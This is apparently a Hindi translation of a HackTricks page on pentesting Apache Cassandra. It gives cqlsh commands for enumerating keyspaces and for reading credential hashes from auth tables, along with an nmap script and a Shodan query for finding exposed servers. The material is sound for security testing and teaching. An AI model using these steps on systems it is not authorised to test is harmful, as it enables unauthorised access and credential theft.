9042/9160 - Pentesting Cassandra

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

मूल जानकारी

अपाचे कैसेंड्रा एक उच्च स्केलेबल, उच्च प्रदर्शन वितरित डेटाबेस है जो बड़ी मात्रा में डेटा को कई साधारण सर्वरों पर हैंडल करने के लिए डिज़ाइन किया गया है, कोई एकल विफलता बिंदु के साथ उच्च उपलब्धता प्रदान करते हैं। यह एक प्रकार का NoSQL डेटाबेस है।

कई मामलों में, आपको यह पता चल सकता है कि कैसेंड्रा किसी भी क्रेडेंशियल को स्वीकार करता है (क्योंकि कोई कॉन्फ़िगर नहीं है) और यह एक हमलावर को **डेटाब

PORT     STATE SERVICE   REASON
9042/tcp open  cassandra-native Apache Cassandra 3.10 or later (native protocol versions 3/v3, 4/v4, 5/v5-beta)
9160/tcp open  cassandra syn-ack

जांच

मैन्युअल

pip install cqlsh
cqlsh <IP>
#Basic info enumeration
SELECT cluster_name, thrift_version, data_center, partitioner, native_protocol_version, rack, release_version from system.local;
#Keyspace enumeration
SELECT keyspace_name FROM system.schema_keyspaces;
desc <Keyspace_name>    #Decribe that DB
desc system_auth        #Describe the DB called system_auth
SELECT * from system_auth.roles;  #Retreive that info, can contain credential hashes
SELECT * from logdb.user_auth;    #Can contain credential hashes
SELECT * from logdb.user;
SELECT * from configuration."config";

स्वचालित

यहाँ बहुत सारे विकल्प नहीं हैं और nmap ज्यादा जानकारी प्राप्त नहीं करता है।

nmap -sV --script cassandra-info -p <PORT> <IP>

Shodan

port:9160 Cluster port:9042 "Invalid or unsupported protocol version"

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

Last updated